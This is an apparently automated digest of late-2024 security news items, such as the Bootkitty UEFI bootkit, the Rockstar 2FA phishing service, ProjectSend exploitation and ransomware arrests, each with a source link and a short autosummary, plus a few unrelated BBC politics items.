    Taiwanese entities in manufacturing, healthcare, and information technology sectors have become the target of a new campaign distributing the SmokeLoader malware. "SmokeLoader is well-known for its versatility and advanced evasion techniques, and its modular design allows it to perform a wide range of attacks," Fortinet FortiGuard Labs said in a report shared with The Hacker News. "While "

    Autosummary: The malware supports several plugins that can steal login and FTP credentials, email addresses, cookies, and other information from web browsers, Outlook, Thunderbird, FileZilla, and WinSCP.


    BootKitty UEFI malware exploits LogoFAIL to infect Linux systems

    exploits Linux
    2024-12-02 https://www.bleepingcomputer.com/news/security/bootkitty-uefi-malware-exploits-logofail-to-infect-linux-systems/
    The recently uncovered "Bootkitty" UEFI bootkit, the first malware of its kind targeting Linux systems, exploits CVE-2023-40238, aka "LogoFAIL," to infect computers running on a vulnerable UEFI firmware. [...]

    Autosummary: (Figure: Bootkitty attack overview. Source: Binarly.) Impact on specific hardware: Binarly says Bootkitty could impact any device that has not been patched against LogoFAIL, but its current shellcode expects specific code used in firmware modules found on Acer, HP, Fujitsu, and Lenovo computers.


    The shocking speed of AWS key exploitation

    exploits
    2024-12-02 https://www.helpnetsecurity.com/2024/12/02/revoke-exposed-aws-keys/

    It’s no secret that developers often inadvertently expose AWS access keys online and we know that these keys are being scraped and misused by attackers before organizations get a chance to revoke them. Clutch Security researchers performed a test to see just how quickly that can happen. They dispersed AWS access keys (in different scenarios) on: code hosting and version control platforms (GitHub and GitLab); public code repositories (Docker Hub for containers, npm for JavaScript …

    The post The shocking speed of AWS key exploitation appeared first on Help Net Security.


    Autosummary: They dispersed AWS access keys (in different scenarios) on: code hosting and version control platforms (GitHub and GitLab); public code repositories (Docker Hub for containers, npm for JavaScript packages, PyPI for software written in Python, Crates.io for Rust crates); repositories for hosting and testing code snippets (JSFiddle, Pastebin, and public and private GitHub Gists); developer forums (Stack Overflow, Quora, Postman Community, and Reddit). The results of this test revealed that attackers tend to find and exploit (within a few minutes)


    Week in review: Exploitable flaws in corporate VPN clients, malware loader created with gaming engine

    exploits
    2024-12-01 https://www.helpnetsecurity.com/2024/12/01/week-in-review-exploitable-flaws-in-corporate-vpn-clients-malware-loader-created-with-gaming-engine/

    Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Researchers reveal exploitable flaws in corporate VPN clients. Researchers have discovered vulnerabilities in the update process of Palo Alto Networks (CVE-2024-5921) and SonicWall (CVE-2024-29014) corporate VPN clients that could be exploited to remotely execute code on users’ devices. Cybercriminals used a gaming engine to create undetectable malware loader. Threat actors are using an ingenious new way for covertly delivering malware …

    The post Week in review: Exploitable flaws in corporate VPN clients, malware loader created with gaming engine appeared first on Help Net Security.


    Autosummary: Infosec products of the month: November 2024. Here’s a look at the most interesting products from the past month, featuring releases from: Absolute, Arkose Labs, Atakama, BlackFog, Eurotech, HiddenLayer, Hornetsecurity, Nirmata, Radware, Rakuten Viber, Symbiotic Security, Tanium, and Vectra AI. Choosing the right secure messaging app for your organization: In this Help Net Security interview, Liad Shnell, CTO at Rakuten Viber, discusses what organizations should look for in secure messaging apps, including encryption, privacy standards, and ease of integration.


    Novel phishing campaign uses corrupted Word documents to evade security

    financial
    2024-12-01 https://www.bleepingcomputer.com/news/security/novel-phishing-campaign-uses-corrupted-word-documents-to-evade-security/
    A novel phishing attack abuses Microsoft’s Word file recovery feature by sending corrupted Word documents as email attachments, allowing them to bypass security software due to their damaged state but still be recoverable by the application. [...]

    Autosummary: (Figure: Phishing email. Source: BleepingComputer.) These attachments use a wide range of themes, all revolving around employee benefits and bonuses, including: Annual_Benefits_&_Bonus_for_[name]_IyNURVhUTlVNUkFORE9NNDUjIw__.docx; Annual_Q4_Benefits_&_Bonus_for_[name]_IyNURVhUTlVNUkFORE9NNDUjIw__.docx.bin; Benefits_&_Bonus_for_[name]_IyNURVhUTlVNUkFORE9NNDUjIw__.docx.bin; Due_&_Payment_for_[name]_IyNURVhUTlVNUkFORE9NNDUjIw__.docx.bin; Q4_Benefits_&_Bonus_for_[name]_IyNURVhUTlVNUkFORE9NNDUjIw__.docx.bin. The documents in this campaign all include the base64 encoded string "IyNURVhUTlVNUkFORE9NNDUjIw," which decodes to "##TEXTNUMRANDOM45##".


    SECURITY AFFAIRS MALWARE NEWSLETTER – ROUND 22

    exploits
    2024-12-01 https://securityaffairs.com/171576/malware/security-affairs-malware-newsletter-round-22.html
    Security Affairs Malware newsletter includes a collection of the best articles and research on malware in the international landscape. A Case-Control Study to Measure Behavioral Risks of Malware Encounters in Organizations; PyPI Python Library “aiocpa” Found Exfiltrating Crypto Keys via Telegram Bot; Bootkitty: Analyzing the first UEFI bootkit for Linux; Hudson Rock Announces First Comprehensive […]



    Hackers stole millions of dollars from Uganda Central Bank

    financial
    2024-12-01 https://securityaffairs.com/171562/security/financially-motivated-threat-actors-hacked-ugandas-central-bank.html
    Financially-motivated threat actors hacked Uganda’s central bank system, government officials confirmed this week. Ugandan officials confirmed on Thursday that the national central bank suffered a security breach by financially-motivated threat actors. The police’s Criminal Investigations Department and the Auditor General are investigating the incident. A senior government official at the finance ministry confirmed that […]

    Autosummary: Hackers stole millions of dollars from Uganda Central Bank. Pierluigi Paganini, December 01, 2024. Financially-motivated threat actors hacked Uganda’s central bank system, government officials confirmed this week.


    Trump threatens 100% tariff on Brics nations if they try to replace dollar

    industry
    2024-12-01 https://www.bbc.com/news/articles/cgrwj0p2dd9o
    The president-elect warned the group of nine nations against moving away from the dollar.

    Autosummary: Major world powers China and Russia are part of the Brics alliance, along with Brazil, India, South Africa, Iran, Egypt, Ethiopia and the United Arab Emirates.


    Wanted Russian Cybercriminal Linked to Hive and LockBit Ransomware Has Been Arrested

    exploits ransomware rusia-ucrania ciber
    2024-11-30 https://thehackernews.com/2024/11/wanted-russian-cybercriminal-linked-to.html
    A Russian cybercriminal wanted in the U.S. in connection with LockBit and Hive ransomware operations has been arrested by law enforcement authorities in the country. According to a news report from Russian media outlet RIA Novosti, Mikhail Pavlovich Matveev has been accused of developing a malicious program designed to encrypt files and seek ransom in return for a decryption key. "At present, "



    SpyLoan Android malware on Google play installed 8 million times

    exploits
    2024-11-30 https://www.bleepingcomputer.com/news/security/spyloan-android-malware-on-google-play-installed-8-million-times/
    A new set of 15 SpyLoan apps with over 8 million installs was discovered on Google Play, targeting primarily users from South America, Southeast Asia, and Africa. [...]



    Notorious ransomware programmer Mikhail Pavlovich Matveev arrested in Russia

    exploits ransomware
    2024-11-30 https://securityaffairs.com/171541/cyber-crime/mikhail-pavlovich-matveev-arrested-in-russia.html
    Russian authorities arrested ransomware affiliate Mikhail Matveev, aka Wazawaka, for developing malware and ties to hacking groups. Russian authorities arrested a ransomware affiliate, Mikhail Pavlovich Matveev (also known as Wazawaka, Uhodiransomwar, m1x, and Boriselcin), and charged him for developing malware and his role in several hacking groups. The man was arrested in Kaliningrad, Russia, law […]

    Autosummary: He has been tied to Lockbit, Conti, and BABUK https://t.co/t2VAJjhlJS — vx-underground (@vxunderground) November 29, 2024. “The Kaliningrad Interior Ministry and the prosecutor’s office reported that the case of a programmer accused of creating a malicious program has been sent to court; according to a RIA Novosti source, this is hacker Mikhail Matveyev, for whom the American FBI is offering a $10 million reward for help in capturing him.” reported RIA Novosti.


    The effect of compliance requirements on vulnerability management strategies

    exploits
    2024-11-29 https://www.helpnetsecurity.com/2024/11/29/steve-carter-nucleus-security-vulnerability-management-challenges/

    In this Help Net Security interview, Steve Carter, CEO of Nucleus Security, discusses the ongoing challenges in vulnerability management, including prioritizing vulnerabilities and addressing patching delays. Carter also covers compliance requirements and how automation can streamline vulnerability management processes. Why do you think challenges like prioritizing vulnerabilities and patching delays persist despite technological advances? The increasing complexity of enterprise infrastructure, expanding attack surface, and improved vulnerability and exposure detection capabilities have all led to a …

    The post The effect of compliance requirements on vulnerability management strategies appeared first on Help Net Security.


    Autosummary: Vulnerability detection and exposure management capabilities have broadened to now include assessments of identity, data management, and SaaS systems, which has significantly increased the volume and types of findings that must be tracked and reported on, which is often overlooked by security and compliance teams. In this Help Net Security interview, Steve Carter, CEO of Nucleus Security, discusses the ongoing challenges in vulnerability management, including prioritizing vulnerabilities and addressing patching delays.


    UK hospital, hit by cyberattack, resorts to paper and postpones procedures

    ciber
    2024-11-29 https://www.bitdefender.com/en-us/blog/hotforsecurity/uk-hospital-hit-by-cyberattack-resorts-to-paper-and-postpones-procedures
    A British hospital is grappling with a major cyberattack that has crippled its IT systems and disrupted patient care. Read more in my article on the Hot for Security blog.

    Autosummary: WUTH, which manages Arrowe Park Hospital, Clatterbridge Hospital, and Wirral Women and Children’s Hospital, proactively isolated its IT systems when it first detected the threat, forcing it to revert to manual processes and the use of pen-and-paper.


    Phishing-as-a-Service "Rockstar 2FA" Targets Microsoft 365 Users with AiTM Attacks

    financial
    2024-11-29 https://thehackernews.com/2024/11/phishing-as-service-rockstar-2fa.html
    Cybersecurity researchers are warning about malicious email campaigns leveraging a phishing-as-a-service (PhaaS) toolkit called Rockstar 2FA with an aim to steal Microsoft 365 account credentials. "This campaign employs an AitM [adversary-in-the-middle] attack, allowing attackers to intercept user credentials and session cookies, which means that even users with multi-factor authentication (MFA) "

    Autosummary: Some of the promoted features of Rockstar 2FA include two-factor authentication (2FA) bypass, 2FA cookie harvesting, antibot protection, login page themes mimicking popular services, fully undetectable (FUD) links, and Telegram bot integration.


    Microsoft Fixes AI, Cloud, and ERP Security Flaws; One Exploited in Active Attacks

    exploits
    2024-11-29 https://thehackernews.com/2024/11/microsoft-fixes-ai-cloud-and-erp.html
    Microsoft has addressed four security flaws impacting its artificial intelligence (AI), cloud, enterprise resource planning, and Partner Center offerings, including one that it said has been exploited in the wild. The vulnerability that has been tagged with an "Exploitation Detected" assessment is CVE-2024-49035 (CVSS score: 8.7), a privilege escalation flaw in partner.microsoft[.]com. "An "



    New Rockstar 2FA phishing service targets Microsoft 365 accounts

    financial
    2024-11-29 https://www.bleepingcomputer.com/news/security/new-rockstar-2fa-phishing-service-targets-microsoft-365-accounts/
    A new phishing-as-a-service (PhaaS) platform named "Rockstar 2FA" has emerged, facilitating large-scale adversary-in-the-middle (AiTM) attacks to steal Microsoft 365 credentials. [...]

    Autosummary: (Source: Trustwave.) The service is promoted on Telegram, among other places, boasting a long list of features like: support for Microsoft 365, Hotmail, Godaddy, SSO; randomized source code and links to evade detection; Cloudflare Turnstile Captcha integration for victim screening; automated FUD attachments and links; user-friendly admin panel with real-time logs and backup options; multiple login page themes with automatic organization branding (logo, background). The service has set up over 5,000 phishing domains since May 2024, facilitating various phishing operations.


    Russia arrests cybercriminal Wazawaka for ties with ransomware gangs

    exploits ransomware ciber
    2024-11-29 https://www.bleepingcomputer.com/news/security/russia-arrests-cybercriminal-wazawaka-for-ties-with-ransomware-gangs/
    Russian law enforcement has arrested and indicted notorious ransomware affiliate Mikhail Pavlovich Matveev (also known as Wazawaka, Uhodiransomwar, m1x, and Boriselcin) for developing malware and his involvement in several hacking groups. [...]

    Autosummary: In April 2021, the defendant and Babuk ransomware coconspirators allegedly deployed malicious payloads on the systems of the Metropolitan Police Department in Washington, D.C. In May 2022, Matveev and Hive ransomware gang members allegedly encrypted the systems of a nonprofit behavioral healthcare organization headquartered in Mercer County, New Jersey.


    Bologna FC confirms data breach after RansomHub ransomware attack

    financial exploits ransomware
    2024-11-29 https://www.bleepingcomputer.com/news/security/bologna-fc-confirms-data-breach-after-ransomhub-ransomware-attack/
    Bologna Football Club 1909 has confirmed it suffered a ransomware attack after its stolen data was leaked online by the RansomHub extortion group. [...]

    Autosummary: Complete financial data of the club’s history; personal and confidential player data; transfer strategies for new and young players; confidential data of fans and employees; data on young athletes; medical records; information on structures and stadiums; commercial strategies and business plans. Previously, the threat actors attempted to blackmail the Italian football team by listing examples of how leaked documents caused other teams to pay huge fines over various violations and used GDPR as leverage.


    New Windows Server 2012 zero-day gets free, unofficial patches

    exploits
    2024-11-29 https://www.bleepingcomputer.com/news/security/new-windows-server-2012-zero-day-gets-free-unofficial-patches/
    Free unofficial security patches have been released through the 0patch platform to address a zero-day vulnerability introduced over two years ago in the Windows Mark of the Web (MotW) security mechanism. [...]



    Phishing-as-a-Service Rockstar 2FA continues to be prevalent

    financial ransomware
    2024-11-29 https://securityaffairs.com/171532/cyber-crime/rockstar-2fa-phaas.html
    Phishing tool Rockstar 2FA targets Microsoft 365 credentials; it uses adversary-in-the-middle (AitM) attacks to bypass multi-factor authentication. Trustwave researchers are monitoring malicious activity associated with Phishing-as-a-Service (PaaS) platforms; their latest report focuses on a toolkit called Rockstar 2FA. Rockstar 2FA targets Microsoft 365 accounts and bypasses multi-factor authentication with adversary-in-the-middle (AitM) attacks. In AiTM phishing, threat […]

    Autosummary: Phishing-as-a-Service Rockstar 2FA continues to be prevalent. Pierluigi Paganini, November 29, 2024. Phishing tool Rockstar 2FA targets Microsoft 365 credentials; it uses adversary-in-the-middle (AitM) attacks to bypass multi-factor authentication.


    Ransomware payments are now a critical business decision

    exploits
    2024-11-28 https://www.helpnetsecurity.com/2024/11/28/ransomware-payment-demands/

    Despite the efforts of law enforcement agencies to stop and bring to justice those responsible for ransomware attacks, the situation is not improving. While authorities do not recommend making a ransomware payment, some companies are forced to make that choice in order to continue their operations. In this article, we present some important statistics about the ransom demands that companies are facing. 83% of organizations experienced at least one ransomware attack in the last year …

    The post Ransomware payments are now a critical business decision appeared first on Help Net Security.


    Autosummary: (Source: Onapsis, ERP Security in the Age of AI-Enhanced Ransomware, September 2024.) 34% of organizations that experience ransomware attacks pay the ransom every time, 21% pay the ransom only some of the time, and 45% never pay the ransom.


    Why cybersecurity leaders trust the MITRE ATT&CK Evaluations

    ciber
    2024-11-28 https://www.helpnetsecurity.com/2024/11/28/cynet-mitre-attck-evaluations/

    In today’s dynamic threat landscape, security leaders are under constant pressure to make informed choices about which solutions and strategies they employ to protect their organizations. The “MITRE Engenuity ATT&CK Evaluations: Enterprise” stand out as an essential resource for cybersecurity decision makers to navigate this challenge. Unlike other independent assessments, MITRE ATT&CK Evaluations simulate real-world threats to assess how competing cybersecurity vendors detect and respond to real-world threats. As soon as the highly anticipated 2024 MITRE … More

    The post Why cybersecurity leaders trust the MITRE ATT&CK Evaluations appeared first on Help Net Security.

    "

    Autosummary: Several key factors set MITRE ATT&CK Evaluations apart from other independent analyst assessments, making them particularly valuable for security leaders: Real-world conditions: Unlike other assessments, MITRE ATT&CK Evaluations are based on simulated TTPs by specific threat actors. "


    VPN vulnerabilities, weak credentials fuel ransomware attacks

    exploits ransomware
    2024-11-28 https://www.helpnetsecurity.com/2024/11/28/vpn-weak-credentials-ransomware-attacks/

    Attackers leveraging virtual private network (VPN) vulnerabilities and weak passwords for initial access contributed to nearly 30% of ransomware attacks, according to Corvus Insurance. According to the Q3 report, many of these incidents were traced to outdated software or VPN accounts with inadequate protection. For example, common usernames such as “admin” or “user” and a lack of multi-factor authentication (MFA) made accounts vulnerable to automated brute-force attacks, where attackers exploit publicly accessible systems by testing … More

    The post VPN vulnerabilities, weak credentials fuel ransomware attacks appeared first on Help Net Security.

    "

    Autosummary: For example, following law enforcement’s takedown of LockBit in Q1, RansomHub, which emerged in February 2024, quickly filled the void, becoming one of the more prolific and dangerous cybercriminal groups. "


    U.S. Telecom Giant T-Mobile Detects Network Intrusion Attempts from Wireline Provider

    Telcos
    2024-11-28 https://thehackernews.com/2024/11/us-telecom-giant-t-mobile-detects.html
    U.S. telecom service provider T-Mobile said it recently detected attempts made by bad actors to infiltrate its systems in recent weeks but noted that no sensitive data was accessed. These intrusion attempts "originated from a wireline provider's network that was connected to ours," Jeff Simon, chief security officer at T-Mobile, said in a statement. "We see no instances of prior attempts like "

    Autosummary: "


    UK hospital network postpones procedures after cyberattack

    ciber
    2024-11-28 https://www.bleepingcomputer.com/news/security/uk-hospital-network-postpones-procedures-after-cyberattack/
    Major UK healthcare provider Wirral University Teaching Hospital (WUTH), part of the NHS Foundation Trust, has suffered a cyberattack that caused a systems outage leading to postponing appointments and scheduled procedures. [...] "

    Autosummary: Collectively, these hospitals contribute to NHS Trust's total of 855 beds and provide 24-hour emergency services, acute medical services, critical care, surgery, diagnostic services, pediatrics, maternity services, and cancer care. "


    Cybercriminals Exploit Popular Game Engine Godot to Distribute Cross-Platform Malware

    exploits ciber
    2024-11-28 https://thehackernews.com/2024/11/cybercriminals-exploit-popular-game.html
    A popular open-source game engine called Godot Engine is being misused as part of a new GodLoader malware campaign, infecting over 17,000 systems since at least June 2024. "Cybercriminals have been taking advantage of Godot Engine to execute crafted GDScript code which triggers malicious commands and delivers malware," Check Point said in a new analysis published Wednesday. "The technique "

    Autosummary: The newest addition is Godot Engine, a game development platform that allows users to design 2D and 3D games across platforms, including Windows, macOS, Linux, Android, iOS, PlayStation, Xbox, Nintendo Switch, and the web. "


    Mimic ransomware: what you need to know

    exploits ransomware
    2024-11-28 https://www.tripwire.com/state-of-security/mimic-ransomware-what-you-need-know
    What makes Mimic particularly unusual is that it exploits the API of a legitimate Windows file search tool ("Everything" by Voidtools) to quickly locate files for encryption. Find out more about the threat in my article on the Tripwire State of Security blog. "

    Autosummary: Yes, some variants of Mimic can also exfiltrate data from a user's computers before it is encrypted - the stolen data is typically used as an additional bargaining chip by the extortionists, who may threaten to release it online or sell it to other criminals. Well, a new variant of Mimic has recently been discovered called Elpaco, which has been used in attacks where malicious hackers accessed victims' systems via RDP after successfully brute-forcing their way in. "


    Over Two Dozen Flaws Identified in Advantech Industrial Wi-Fi Access Points – Patch ASAP

    industry
    2024-11-28 https://thehackernews.com/2024/11/over-two-dozen-flaws-identified-in.html
    Nearly two dozen security vulnerabilities have been disclosed in Advantech EKI industrial-grade wireless access point devices, some of which could be weaponized to bypass authentication and execute code with elevated privileges. "These vulnerabilities pose significant risks, allowing unauthenticated remote code execution with root privileges, thereby fully compromising the confidentiality, "

    Autosummary: "


    A cyberattack impacted operations at UK Wirral University Teaching Hospital

    ciber
    2024-11-28 https://securityaffairs.com/171509/uncategorized/uks-wirral-university-teaching-hospital-cyberattack.html
    UK’s Wirral University Teaching Hospital suffered a cyberattack that caused delays in appointments and procedures. Wirral University Teaching Hospital NHS Foundation Trust (WUTH) is an NHS Foundation Trust. It provides healthcare for people of the Wirral Peninsula and the surrounding areas of North West England and North Wales. The trust is responsible for Arrowe Park […] "

    Autosummary: A cyberattack impacted operations at UK Wirral University Teaching Hospital Pierluigi Paganini November 28, 2024 November 28, 2024 UK’s Wirral University Teaching Hospital suffered a cyberattack that caused delays in appointments and procedures. "


    ProjectSend critical flaw actively exploited in the wild, experts warn

    exploits
    2024-11-28 https://securityaffairs.com/171494/hacking/projectsend-critical-flaw-actively-exploited.html
    Researchers warn that a critical security flaw in ProjectSend open-source file-sharing application may be under active exploitation. VulnCheck researchers warn that ProjectSend vulnerability CVE-2024-11680 (CVSS score: 9.8) appears to have been exploited by attackers in the wild. The vulnerability is an improper authentication issue that impacts ProjectSend versions before r1720. Remote, unauthenticated attackers can exploit this flaw […] "

    Autosummary: ProjectSend critical flaw actively exploited in the wild, experts warn Pierluigi Paganini November 28, 2024 November 28, 2024 Researchers warn that a critical security flaw in ProjectSend open-source file-sharing application may be under active exploitation. "


    Colombian navy intercepts narco-subs taking new route to Australia

    latam
    2024-11-28 https://www.bbc.com/news/articles/clyrjng13jlo
    A semi-submersible packed full of cocaine is the latest of a number to be seized in the Pacific Ocean. "

    Autosummary: "


    Mexico leader responds to Trump claim she agreed to stop migration

    latam
    2024-11-28 https://www.bbc.com/news/articles/c89v4w51dzyo
    President Claudia Sheinbaum says Mexico's position is not to close borders, and to respect human rights. "

    Autosummary: "


    Supply chain managers underestimate cybersecurity risks in warehouses

    ciber
    2024-11-27 https://www.helpnetsecurity.com/2024/11/27/warehouses-cybersecurity-concern/

    32% of warehouse respondents report that social engineering is one of the most-used entry points in warehouse cyberattacks – tied with software vulnerabilities (32%) and followed by devices (19%), according to Ivanti. Cyberattacks on warehouses threaten supply chain stability As the backbone of the supply chain, a cyberattack on a warehouse can result in major consequences such as significant operational downtime, damage to a company’s reputation and financial losses. Given the vast amount of data … More

    The post Supply chain managers underestimate cybersecurity risks in warehouses appeared first on Help Net Security.

    "

    Autosummary: The top budget priorities for supply chain managers are sourcing and procurement (41%), workforce productivity (40%), automation technologies (39%), and lowering operating costs (39%). "


    Hottest cybersecurity open-source tools of the month: November 2024

    ciber
    2024-11-27 https://www.helpnetsecurity.com/2024/11/27/open-source-cybersecurity-tools-november-2024/

    This month’s roundup features exceptional open-source cybersecurity tools that are gaining attention for strengthening security across various environments. ScubaGear ScubaGear is an open-source tool the Cybersecurity and Infrastructure Security Agency (CISA) created to automatically evaluate Microsoft 365 (M365) configurations for potential security gaps. ScubaGear analyzes an organization’s M365 tenant configuration, offering actionable insights and recommendations to help administrators address security gaps and strengthen defenses within their Microsoft 365 environment. Am I Isolated: Open-source container security … More

    The post Hottest cybersecurity open-source tools of the month: November 2024 appeared first on Help Net Security.

    "

    Autosummary: "


    QScanner: Linux command-line utility for scanning container images, conducting SCA

    Linux
    2024-11-27 https://www.helpnetsecurity.com/2024/11/27/qscanner-linux-scanning-container-images/

    QScanner is a Linux command-line utility tailored for scanning container images and performing Software Composition Analysis (SCA). It is compatible with diverse container orchestration systems, container runtimes, and operating systems. QScanner features Instant console results: Scan for vulnerabilities and receive real-time results directly on the console. Integration: Seamlessly integrate QScanner with your CI/CD pipelines and leverage the benefits of security policy-based evaluations. Runtime support: QScanner is compatible with multiple container runtimes enabling flexibility in deployment … More

    The post QScanner: Linux command-line utility for scanning container images, conducting SCA appeared first on Help Net Security.

    "

    Autosummary: "


    Zero-day data security

    exploits
    2024-11-27 https://www.helpnetsecurity.com/2024/11/27/zero-day-data-security-video/

    In this Help Net Security video, Carl Froggett, CIO of Deep Instinct, discusses the complexities of modern cloud architectures and why current defenses are falling short. He talks about the rise of zero-day data security and the need for organizations to stop attacks before they breach cloud environments and exfiltrate sensitive data.

    The post Zero-day data security appeared first on Help Net Security.

    "

    Autosummary: "


    Matrix Botnet Exploits IoT Devices in Widespread DDoS Botnet Campaign

    exploits industry
    2024-11-27 https://thehackernews.com/2024/11/matrix-botnet-exploits-iot-devices-in.html
    A threat actor named Matrix has been linked to a widespread distributed denial-of-service (DDoS) campaign that leverages vulnerabilities and misconfigurations in Internet of Things (IoT) devices to co-opt them into a disruptive botnet. "This operation serves as a comprehensive one-stop shop for scanning, exploiting vulnerabilities, deploying malware, and setting up shop kits, showcasing a "

    Autosummary: "This operation serves as a comprehensive one-stop shop for scanning, exploiting vulnerabilities, deploying malware, and setting up shop kits, showcasing a do-it-all-yourself approach to cyberattacks," Assaf Morag, director of threat intelligence at cloud security firm Aqua, said. "


    APT-C-60 Exploits WPS Office Vulnerability to Deploy SpyGlace Backdoor

    exploits
    2024-11-27 https://thehackernews.com/2024/11/apt-c-60-exploits-wps-office.html
    The threat actor known as APT-C-60 has been linked to a cyber attack targeting an unnamed organization in Japan that used a job application-themed lure to deliver the SpyGlace backdoor. That's according to findings from JPCERT/CC, which said the intrusion leveraged legitimate services like Google Drive, Bitbucket, and StatCounter. The attack was carried out around August 2024. "In this attack, "

    Autosummary: The downloader then accesses Bitbucket using the encoded unique string in order to retrieve the next stage, a file known as "Service.dat," which downloads two more artifacts from a different Bitbucket repository – "cbmp.txt" and "icon.txt" – which are saved as "cn.dat" and "sp.dat," respectively. "


    The Black Friday 2024 Cybersecurity, IT, VPN, & Antivirus Deals

    ciber
    2024-11-27 https://www.bleepingcomputer.com/news/security/the-black-friday-2024-cybersecurity-it-vpn-and-antivirus-deals/
    Black Friday 2024 is almost here, and great deals are already live in computer security, software, online courses, system admin services, antivirus, and VPN software. These promotions offer deep discounts from various companies and are only available for a limited time. [...] "

    Autosummary: "


    ESET researchers analyze first UEFI bootkit for Linux systems

    Linux
    2024-11-27 https://www.helpnetsecurity.com/2024/11/27/linux-uefi-bootkit-bootkitty/

    ESET Research has discovered the first UEFI bootkit designed for Linux systems, named Bootkitty by its creators. Researchers believe this bootkit is likely an initial proof of concept, and based on ESET telemetry, it has not been deployed in the wild. Bootkitty execution overview (Source: ESET) However, it is the first evidence that UEFI bootkits are no longer confined to Windows systems alone. The bootkit’s main goal is to disable the kernel’s signature verification feature … More

    The post ESET researchers analyze first UEFI bootkit for Linux systems appeared first on Help Net Security.

    "

    Autosummary: It all started with the first UEFI bootkit proof of concept (PoC), described by Andrea Allievi in 2012, which served as a demonstration of deploying bootkits on modern UEFI-based Windows systems, and was followed with many other PoCs (EfiGuard, Boot Backdoor, UEFI-bootkit). "


    Researchers Discover "Bootkitty" – First UEFI Bootkit Targeting Linux Kernels

    Linux
    2024-11-27 https://thehackernews.com/2024/11/researchers-discover-bootkitty-first.html
    Cybersecurity researchers have shed light on what has been described as the first Unified Extensible Firmware Interface (UEFI) bootkit designed for Linux systems. Dubbed Bootkitty by its creators who go by the name BlackCat, the bootkit is assessed to be a proof-of-concept (PoC) and there is no evidence that it has been put to use in real-world attacks. Also tracked as IranuKit, it was uploaded "

    Autosummary: "


    Critical Flaw in ProjectSend Under Active Exploitation Against Public-Facing Servers

    exploits
    2024-11-27 https://thehackernews.com/2024/11/critical-flaw-in-projectsend-under.html
    A critical security flaw impacting the ProjectSend open-source file-sharing application has likely come under active exploitation in the wild, according to findings from VulnCheck. The vulnerability, originally patched over a year-and-a-half ago as part of a commit pushed in May 2023, was not officially made available until August 2024 with the release of version r1720. As of November 26, 2024, "

    Autosummary: "


    Researchers discover first UEFI bootkit malware for Linux

    exploits Linux
    2024-11-27 https://www.bleepingcomputer.com/news/security/researchers-discover-bootkitty-first-uefi-bootkit-malware-for-linux/
    The first UEFI bootkit specifically targeting Linux systems has been discovered, marking a shift in stealthy and hard-to-remove bootkit threats that previously focused on Windows. [...] "

    Autosummary: Next, it hooks various GRUB functions like "start_image" and "grub_verifiers_open" to manipulate the bootloader's integrity checks for binaries, including the Linux kernel, turning off signature verification. "


    Cybercriminals used a gaming engine to create undetectable malware loader

    exploits ciber
    2024-11-27 https://www.helpnetsecurity.com/2024/11/27/godot-engine-malware-loader-godloader/

    Threat actors are using an ingenious new way for covertly delivering malware to a wide variety of operating systems and platforms: they have created a malware loader that uses Godot Engine, an open-source game engine. The loader – dubbed GodLoader – is distributed through the Stargazers Ghost Network, an extensive network of GitHub accounts and repositories that provides malware distribution “as-a-Service”. According to Check Point researchers, over 17,000 machines have been infected with the malicious … More

    The post Cybercriminals used a gaming engine to create undetectable malware loader appeared first on Help Net Security.

    "

    Autosummary: Crafting the malware loader with the Godot Engine Godot Engine is a popular free and open source 2D and 3D game engine / development platform that can both run on many platforms and export projects to Windows, Linux, macOS, Android, iOS, various VR platforms, and more. "


    Hackers exploit ProjectSend flaw to backdoor exposed servers

    exploits
    2024-11-27 https://www.bleepingcomputer.com/news/security/hackers-exploit-projectsend-flaw-to-backdoor-exposed-servers/
    Threat actors are using public exploits for a critical authentication bypass flaw in ProjectSend to upload webshells and gain remote access to servers. [...] "

    Autosummary: Specifically, the researchers report that, based on Shodan data, 55% of the exposed instances run r1605, released in October 2022, 44% use an unnamed release from April 2023, and only 1% is on r1750, the patched version. "


    Bootkitty is the first UEFI Bootkit designed for Linux systems

    Linux
    2024-11-27 https://securityaffairs.com/171479/malware/bootkitty-uefi-bootkit-linux.html
    ESET discovered the first Unified Extensible Firmware Interface (UEFI) bootkit specifically designed for Linux systems, named Bootkitty. Cybersecurity researchers from ESET discovered the first UEFI bootkit designed to target Linux systems, called by its authors Bootkitty. The bootkit allows attackers to disable the kernel’s signature verification feature and to preload two as yet unknown ELF […] "

    Autosummary: “Bootkitty is designed to boot the Linux kernel seamlessly, whether UEFI Secure Boot is enabled or not, as it patches, in memory, the necessary functions responsible for integrity verification before GRUB is executed.” continues the report. "


    Russian group RomCom exploited Firefox and Tor Browser zero-days to target attacks Europe and North America

    exploits rusia-ucrania
    2024-11-27 https://securityaffairs.com/171443/apt/russia-romcom-group-firefox-tor-browser-zero-day.html
    The Russian RomCom group exploited Firefox and Tor Browser zero-day vulnerabilities in attacks on users in Europe and North America. Russian-based cybercrime group RomCom (aka UAT-5647, Storm-0978, Tropical Scorpius, UAC-0180, UNC2596) exploited two Firefox and Tor Browser zero-day vulnerabilities in recent attacks on users across Europe and North America. The first zero-day exploited by the Russian group, is a use-after-free […] "

    Autosummary: Russian-based cybercrime group RomCom (aka UAT-5647, Storm-0978, Tropical Scorpius, UAC-0180, UNC2596) exploited two Firefox and Tor Browser zero-day vulnerabilities in recent attacks on users across Europe and North America. "


    "No-one will win" - Canada, Mexico and China respond to Trump tariff threats

    latam
    2024-11-27 https://www.bbc.com/news/articles/cj6kj2752jlo
    Mexico said it would slap tit-for-tat tariffs on the US, while China said Trump's finger-pointing "runs completely counter to facts". "

    Autosummary: Meanwhile, a spokesman for China's embassy in Washington, Liu Pengyu, told the BBC that "China-US economic and trade co-operation is mutually beneficial in nature". Doug Ford, the premier of Ontario, Canada's most populous province, said on Monday the proposed tariff would be "devastating to workers and jobs in both Canada and the US". "


    Cybersecurity jobs available right now: November 26, 2024

    ciber
    2024-11-26 https://www.helpnetsecurity.com/2024/11/26/cybersecurity-jobs-available-right-now-november-26-2024/

    Application Security Engineer Agoda | UAE | Hybrid – View job details As an Application Security Engineer, you will develop and design application-level security controls and standards. Perform application security design reviews against new products and services. Track and prioritize all security issues. Build internal security tools that help fix security problems at scale. Perform code review and drive remediation of discovered issues. Enable automated security testing at scale to measure vulnerability, and report on … More

    The post Cybersecurity jobs available right now: November 26, 2024 appeared first on Help Net Security.

    "

